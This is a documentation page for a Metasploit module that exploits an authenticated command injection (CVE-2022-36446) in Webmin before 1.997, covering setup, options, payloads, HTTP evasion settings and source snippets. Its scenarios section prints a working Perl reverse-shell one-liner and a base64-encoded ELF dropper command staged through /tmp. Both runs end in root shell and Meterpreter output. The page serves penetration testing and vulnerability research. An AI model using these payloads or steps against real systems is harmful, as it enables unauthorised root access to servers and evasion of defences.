Webmin Package Updates RCE - Metasploit


This page contains detailed information about how to use the exploit/linux/http/webmin_package_updates_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Webmin Package Updates RCE
Module: exploit/linux/http/webmin_package_updates_rce
Source code: modules/exploits/linux/http/webmin_package_updates_rce.rb
Disclosure date: 2022-07-26
Last modification time: 2022-08-09 15:09:25 +0000
Supported architecture(s): cmd, x86, x64, aarch64
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 10000
List of CVEs: CVE-2022-36446

This module exploits an arbitrary command injection in Webmin versions prior to 1.997. Webmin uses the OS package manager (apt, yum, etc.) to perform package updates and installation. Due to a lack of input sanitization, it is possibe to inject arbitrary command that will be concatenated to the package manager call. This exploit requires authentication and the account must have access to the Software Package Updates module.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


msf > use exploit/linux/http/webmin_package_updates_rce
msf exploit(webmin_package_updates_rce) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


This module exploits an arbitrary command injection in Webmin versions prior to 1.997.

Webmin uses the OS package manager (apt, yum, etc.) to perform package updates and installation. Due to a lack of input sanitization, it is possible to inject an arbitrary command that will be concatenated to the package manager call.

This exploit requires authentication and the account must have access to the Software Package Updates module.

Installation


Ubuntu

  • Download a vulnerable version: http://prdownloads.sourceforge.net/webadmin/webmin_1.996_all.deb
  • Install it along with its dependencies (libio-pty-perl required when installing on Ubuntu 20.04) apt-get install libauthen-pam-perl libio-pty-perl dpkg -i ./webmin_1.996_all.deb

Setup


  • Go to https://<target IP>:10000/
  • Login as root with the OS password
  • Create a new user: Webmin > Webmin Users > Create a new privileged user > enter the username and password > click Create
  • Setup permissions Click on the username > Available Webmin modules > select "Software Package Updates" in the System module list > Save

Verification Steps


  1. Install and setup the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/webmin_package_updates_rce
  4. Do: run lhost=<local IP> rhosts=<target IP> username=<username> password=<user password>
  5. You should get a shell.

Options


TARGETURI

Set this to the Webmin base path. The default is /.

USERNAME

The account username to use.

PASSWORD

The account password.

Scenarios


Webmin 1.996 on Ubuntu 18.04

  • Target 0 (Unix In-Memory)
    msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456

[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.0.2:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.)/){system $1;}};' [] Started reverse TCP handler on 192.168.0.2:4444 [] Running automatic check ("set AutoCheck false" to disable) [] Webmin 1.996 detected [+] Webmin 1.996 is a supported target [+] The target appears to be vulnerable. [] Attempting login [+] Logged in! [] Sending payload [] Command shell session 4 opened (192.168.0.2:4444 -> 192.168.0.23:51860) at 2022-08-03 11:26:01 +0200

id uid=0(root) gid=0(root) groups=0(root)

cat /etc/issue Ubuntu 18.04.6 LTS \n \l

  • Target 1 (Linux Dropper)
    msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456

[] Started reverse TCP handler on 192.168.0.2:4444 [] Running automatic check ("set AutoCheck false" to disable) [] Webmin 1.996 detected [+] Webmin 1.996 is a supported target [+] The target appears to be vulnerable. [] Attempting login [+] Logged in! [] Sending payload [] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/abOFM.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/IBkCa' < '/tmp/abOFM.b64' ; chmod +x '/tmp/IBkCa' ; '/tmp/IBkCa' ; rm -f '/tmp/IBkCa' ; rm -f '/tmp/abOFM.b64'"] [] Transmitting intermediate stager...(126 bytes) [] Sending stage (3020772 bytes) to 192.168.0.23 [] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.23:51870) at 2022-08-03 11:26:51 +0200 [] Command Stager progress - 100.00% done (823/823 bytes)

meterpreter > getuid Server username: root meterpreter > sysinfo Computer : 192.168.0.23 OS : Ubuntu 18.04 (Linux 5.4.0-122-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux

Go back to menu.

Msfconsole Usage


Here is how the linux/http/webmin_package_updates_rce exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/webmin_package_updates_rce

[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_package_updates_rce) > show info

       Name: Webmin Package Updates RCE
     Module: exploit/linux/http/webmin_package_updates_rce
   Platform: Unix, Linux
       Arch: cmd, x86, x64, aarch64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-07-26

Provided by:
  Christophe De La Fuente
  Emir Polat

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix In-Memory
  1   Linux Dropper (x86 & x64)
  2   Linux Dropper (ARM64)

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   123456           no        Password to login with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      10000            yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0
                                         to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path to Webmin
  URIPATH                     no        The URI to use for this exploit (default is random)
  USERNAME   admin            yes       User to login with
  VHOST                       no        HTTP server virtual host

Payload information:
  Avoid: 1 characters

Description:
  This module exploits an arbitrary command injection in Webmin 
  versions prior to 1.997. Webmin uses the OS package manager (`apt`, 
  `yum`, etc.) to perform package updates and installation. Due to a 
  lack of input sanitization, it is possibe to inject arbitrary 
  command that will be concatenated to the package manager call. This 
  exploit requires authentication and the account must have access to 
  the Software Package Updates module.

References:
  https://www.exploit-db.com/exploits/50998
  https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
  https://nvd.nist.gov/vuln/detail/CVE-2022-36446

Module Options


This is a complete list of options available in the linux/http/webmin_package_updates_rce exploit:

msf6 exploit(linux/http/webmin_package_updates_rce) > show options

Module options (exploit/linux/http/webmin_package_updates_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   123456           no        Password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      10000            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.
                                         0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path to Webmin
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       User to login with
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix In-Memory

Advanced Options


Here is a complete list of advanced options supported by the linux/http/webmin_package_updates_rce exploit:

msf6 exploit(linux/http/webmin_package_updates_rce) > show advanced

Module advanced options (exploit/linux/http/webmin_package_updates_rce):

   Name                     Current Setting                        Required  Description
   ----                     ---------------                        --------  -----------
   AutoCheck                true                                   no        Run check before exploit
   CMDSTAGER::DECODER                                              no        The decoder stub to use.
   CMDSTAGER::FLAVOR        auto                                   no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_wri
                                                                             te, echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch,
                                                                              lwprequest, psh_invokewebrequest, ftp_http)
   CMDSTAGER::SSL           false                                  no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                 no        Writable directory for staged files
   CMDSTAGER::URIPATH                                              no        Payload URI path for supported stagers
   ContextInformationFile                                          no        The information file that contains context information
   DOMAIN                   WORKSTATION                            yes       The domain to use for Windows authentication
   DigestAuthIIS            true                                   no        Conform to IIS, should work for most servers. Only set to false for
                                                                             non-IIS servers
   DisablePayloadHandler    false                                  no        Disable the handler code for the selected payload
   EXE::Custom                                                     no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR               false                                  no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack            false                                  no        Use the default template in case the specified one is missing
   EXE::Inject              false                                  no        Set to preserve the original EXE function
   EXE::OldMethod           false                                  no        Set to use the substitution EXE generation method.
   EXE::Path                                                       no        The directory in which to look for the executable template
   EXE::Template                                                   no        The executable template file name.
   EnableContextEncoding    false                                  no        Use transient context when encoding payloads
   FingerprintCheck         true                                   no        Conduct a pre-exploit fingerprint verification
   ForceExploit             false                                  no        Override check result
   HttpClientTimeout                                               no        HTTP connection and receive timeout
   HttpPassword                                                    no        The HTTP password to specify for authentication
   HttpRawHeaders                                                  no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                false                                  no        Show the raw HTTP requests and responses
   HttpTraceColors          red/blu                                no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly     false                                  no        Show HTTP headers only in HttpTrace
   HttpUsername                                                    no        The HTTP username to specify for authentication
   ListenerBindAddress                                             no        The specific IP address to bind to if different from SRVHOST
   ListenerBindPort                                                no        The port to bind to if different from SRVPORT
   ListenerComm                                                    no        The specific communication channel to use for this service
   MSI::Custom                                                     no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR               false                                  no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                       no        The directory in which to look for the msi template
   MSI::Template                                                   no        The msi template file name
   MSI::UAC                 false                                  no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                       no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression           false                                  no        Enable SSL/TLS-level compression
   SSLServerNameIndication                                         no        SSL/TLS Server Name Indication (SNI)
   SSLVersion               Auto                                   yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are a
                                                                             uto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1
                                                                             .2)
   SendRobots               false                                  no        Return a robots.txt file if asked for one
   URIHOST                                                         no        Host to use in URI (useful for tunnels)
   URIPORT                                                         no        Port to use in URI (useful for tunnels)
   UserAgent                Mozilla/5.0 (Macintosh; Intel Mac OS   no        The User-Agent header to use for all requests
                            X 12.2; rv:97.0) Gecko/20100101 Firef
                            ox/97.0
   VERBOSE                  false                                  no        Enable detailed status messages
   WORKSPACE                                                       no        Specify the workspace for this module
   WfsDelay                 2                                      no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_perl):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy b
                                                          ut directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/webmin_package_updates_rce module can exploit:

msf6 exploit(linux/http/webmin_package_updates_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix In-Memory
   1   Linux Dropper (x86 & x64)
   2   Linux Dropper (ARM64)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/webmin_package_updates_rce exploit:

msf6 exploit(linux/http/webmin_package_updates_rce) > show payloads

Compatible Payloads
===================

   #   Name                                                  Disclosure Date  Rank    Check  Description
   -   ----                                                  ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                              normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                                  normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_inetd                                            normal  No     Unix Command Shell, Bind TCP (inetd)
   3   payload/cmd/unix/bind_jjs                                              normal  No     Unix Command Shell, Bind TCP (via jjs)
   4   payload/cmd/unix/bind_lua                                              normal  No     Unix Command Shell, Bind TCP (via Lua)
   5   payload/cmd/unix/bind_netcat                                           normal  No     Unix Command Shell, Bind TCP (via netcat)
   6   payload/cmd/unix/bind_netcat_gaping                                    normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   7   payload/cmd/unix/bind_netcat_gaping_ipv6                               normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   8   payload/cmd/unix/bind_nodejs                                           normal  No     Unix Command Shell, Bind TCP (via nodejs)
   9   payload/cmd/unix/bind_perl                                             normal  No     Unix Command Shell, Bind TCP (via Perl)
   10  payload/cmd/unix/bind_perl_ipv6                                        normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   11  payload/cmd/unix/bind_r                                                normal  No     Unix Command Shell, Bind TCP (via R)
   12  payload/cmd/unix/bind_ruby                                             normal  No     Unix Command Shell, Bind TCP (via Ruby)
   13  payload/cmd/unix/bind_ruby_ipv6                                        normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   14  payload/cmd/unix/bind_socat_udp                                        normal  No     Unix Command Shell, Bind UDP (via socat)
   15  payload/cmd/unix/bind_stub                                             normal  No     Unix Command Shell, Bind TCP (stub)
   16  payload/cmd/unix/bind_zsh                                              normal  No     Unix Command Shell, Bind TCP (via Zsh)
   17  payload/cmd/unix/generic                                               normal  No     Unix Command, Generic Command Execution
   18  payload/cmd/unix/pingback_bind                                         normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   19  payload/cmd/unix/pingback_reverse                                      normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   20  payload/cmd/unix/python/meterpreter/bind_tcp                           normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager
   21  payload/cmd/unix/python/meterpreter/bind_tcp_uuid                      normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support
   22  payload/cmd/unix/python/meterpreter/reverse_http                       normal  No     Python Exec, Python Meterpreter, Python Reverse HTTP Stager
   23  payload/cmd/unix/python/meterpreter/reverse_https                      normal  No     Python Exec, Python Meterpreter, Python Reverse HTTPS Stager
   24  payload/cmd/unix/python/meterpreter/reverse_tcp                        normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager
   25  payload/cmd/unix/python/meterpreter/reverse_tcp_ssl                    normal  No     Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager
   26  payload/cmd/unix/python/meterpreter/reverse_tcp_uuid                   normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support
   27  payload/cmd/unix/python/meterpreter_bind_tcp                           normal  No     Python Exec, Python Meterpreter Shell, Bind TCP Inline
   28  payload/cmd/unix/python/meterpreter_reverse_http                       normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTP Inline
   29  payload/cmd/unix/python/meterpreter_reverse_https                      normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline
   30  payload/cmd/unix/python/meterpreter_reverse_tcp                        normal  No     Python Exec, Python Meterpreter Shell, Reverse TCP Inline
   31  payload/cmd/unix/python/pingback_bind_tcp                              normal  No     Python Exec, Python Pingback, Bind TCP (via python)
   32  payload/cmd/unix/python/pingback_reverse_tcp                           normal  No     Python Exec, Python Pingback, Reverse TCP (via python)
   33  payload/cmd/unix/python/shell_bind_tcp                                 normal  No     Python Exec, Command Shell, Bind TCP (via python)
   34  payload/cmd/unix/python/shell_reverse_tcp                              normal  No     Python Exec, Command Shell, Reverse TCP (via python)
   35  payload/cmd/unix/python/shell_reverse_tcp_ssl                          normal  No     Python Exec, Command Shell, Reverse TCP SSL (via python)
   36  payload/cmd/unix/python/shell_reverse_udp                              normal  No     Python Exec, Command Shell, Reverse UDP (via python)
   37  payload/cmd/unix/reverse                                               normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   38  payload/cmd/unix/reverse_awk                                           normal  No     Unix Command Shell, Reverse TCP (via AWK)
   39  payload/cmd/unix/reverse_bash                                          normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   40  payload/cmd/unix/reverse_bash_telnet_ssl                               normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   41  payload/cmd/unix/reverse_bash_udp                                      normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   42  payload/cmd/unix/reverse_jjs                                           normal  No     Unix Command Shell, Reverse TCP (via jjs)
   43  payload/cmd/unix/reverse_ksh                                           normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   44  payload/cmd/unix/reverse_lua                                           normal  No     Unix Command Shell, Reverse TCP (via Lua)
   45  payload/cmd/unix/reverse_ncat_ssl                                      normal  No     Unix Command Shell, Reverse TCP (via ncat)
   46  payload/cmd/unix/reverse_netcat                                        normal  No     Unix Command Shell, Reverse TCP (via netcat)
   47  payload/cmd/unix/reverse_netcat_gaping                                 normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   48  payload/cmd/unix/reverse_nodejs                                        normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   49  payload/cmd/unix/reverse_openssl                                       normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   50  payload/cmd/unix/reverse_perl                                          normal  No     Unix Command Shell, Reverse TCP (via Perl)
   51  payload/cmd/unix/reverse_perl_ssl                                      normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   52  payload/cmd/unix/reverse_php_ssl                                       normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   53  payload/cmd/unix/reverse_python                                        normal  No     Unix Command Shell, Reverse TCP (via Python)
   54  payload/cmd/unix/reverse_python_ssl                                    normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   55  payload/cmd/unix/reverse_r                                             normal  No     Unix Command Shell, Reverse TCP (via R)
   56  payload/cmd/unix/reverse_ruby                                          normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   57  payload/cmd/unix/reverse_ruby_ssl                                      normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   58  payload/cmd/unix/reverse_socat_udp                                     normal  No     Unix Command Shell, Reverse UDP (via socat)
   59  payload/cmd/unix/reverse_ssh                                           normal  No     Unix Command Shell, Reverse TCP SSH
   60  payload/cmd/unix/reverse_ssl_double_telnet                             normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   61  payload/cmd/unix/reverse_stub                                          normal  No     Unix Command Shell, Reverse TCP (stub)
   62  payload/cmd/unix/reverse_tclsh                                         normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   63  payload/cmd/unix/reverse_zsh                                           normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   64  payload/generic/custom                                                 normal  No     Custom Payload
   65  payload/generic/shell_bind_tcp                                         normal  No     Generic Command Shell, Bind TCP Inline
   66  payload/generic/shell_reverse_tcp                                      normal  No     Generic Command Shell, Reverse TCP Inline
   67  payload/generic/ssh/interact                                           normal  No     Interact with Established SSH Connection

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/webmin_package_updates_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/webmin_package_updates_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, defl
                                                            ate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apac
                                                            he)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apa
                                                            che)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::shuffle_get_params      false            no        Randomize order of GET parameters
   HTTP::shuffle_post_params     false            no        Randomize order of POST parameters
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all,
                                                            u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Could not connect to web service - no response


Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:

97:	    res = send_request_cgi(
98:	      'method' => 'GET',
99:	      'uri' => normalize_uri(target_uri.path)
100:	    )
101:	
102:	    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") unless res
103:	
104:	    if res.body.include?('This web server is running in SSL mode.')
105:	      return CheckCode::Unknown("#{peer} - Please enable the SSL option to proceed")
106:	    end
107:	

<PEER> - Please enable the SSL option to proceed


Here is a relevant code snippet related to the "<PEER> - Please enable the SSL option to proceed" error message:

100:	    )
101:	
102:	    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") unless res
103:	
104:	    if res.body.include?('This web server is running in SSL mode.')
105:	      return CheckCode::Unknown("#{peer} - Please enable the SSL option to proceed")
106:	    end
107:	
108:	    version = res.headers['Server'].to_s.scan(%r{MiniServ/([\d.]+)}).flatten.first
109:	
110:	    return CheckCode::Unknown("#{peer} - Webmin version not detected") unless version

<PEER> - Webmin version not detected


Here is a relevant code snippet related to the "<PEER> - Webmin version not detected" error message:

105:	      return CheckCode::Unknown("#{peer} - Please enable the SSL option to proceed")
106:	    end
107:	
108:	    version = res.headers['Server'].to_s.scan(%r{MiniServ/([\d.]+)}).flatten.first
109:	
110:	    return CheckCode::Unknown("#{peer} - Webmin version not detected") unless version
111:	
112:	    version = Rex::Version.new(version)
113:	
114:	    vprint_status("Webmin #{version} detected")
115:	

<PEER> - Webmin <VERSION> is not a supported target


Here is a relevant code snippet related to the "<PEER> - Webmin <VERSION> is not a supported target" error message:

112:	    version = Rex::Version.new(version)
113:	
114:	    vprint_status("Webmin #{version} detected")
115:	
116:	    unless version < Rex::Version.new('1.997')
117:	      return CheckCode::Safe("#{peer} - Webmin #{version} is not a supported target")
118:	    end
119:	
120:	    vprint_good("Webmin #{version} is a supported target")
121:	
122:	    CheckCode::Appears

<PEER> - Could not connect to web service


Here is a relevant code snippet related to the "<PEER> - Could not connect to web service" error message:

119:	
120:	    vprint_good("Webmin #{version} is a supported target")
121:	
122:	    CheckCode::Appears
123:	  rescue ::Rex::ConnectionError
124:	    return CheckCode::Unknown("#{peer} - Could not connect to web service")
125:	  end
126:	
127:	  def do_login
128:	    res = send_request_cgi({
129:	      'method' => 'POST',

<PEER> - Could not connect to web service - no response


Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:

135:	        'user' => datastore['USERNAME'],
136:	        'pass' => datastore['PASSWORD']
137:	      }
138:	    })
139:	
140:	    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") unless res
141:	    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 302
142:	
143:	    print_good('Logged in!')
144:	  end
145:	

<PEER> - Invalid credentials (response code: <RES.CODE>)


Here is a relevant code snippet related to the "<PEER> - Invalid credentials (response code: <RES.CODE>)" error message:

136:	        'pass' => datastore['PASSWORD']
137:	      }
138:	    })
139:	
140:	    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") unless res
141:	    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 302
142:	
143:	    print_good('Logged in!')
144:	  end
145:	
146:	  def execute_command(cmd, _opts = {})

<PEER> - Could not connect to the web service


Here is a relevant code snippet related to the "<PEER> - Could not connect to the web service" error message:

169:	    print_status('Sending payload')
170:	    case target['Type']
171:	    when :unix_memory
172:	      execute_command(payload.encoded)
173:	    when :linux_dropper
174:	      execute_cmdstager
175:	    end
176:	  rescue ::Rex::ConnectionError
177:	    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
178:	  end
179:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Christophe De La Fuente
  • Emir Polat

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.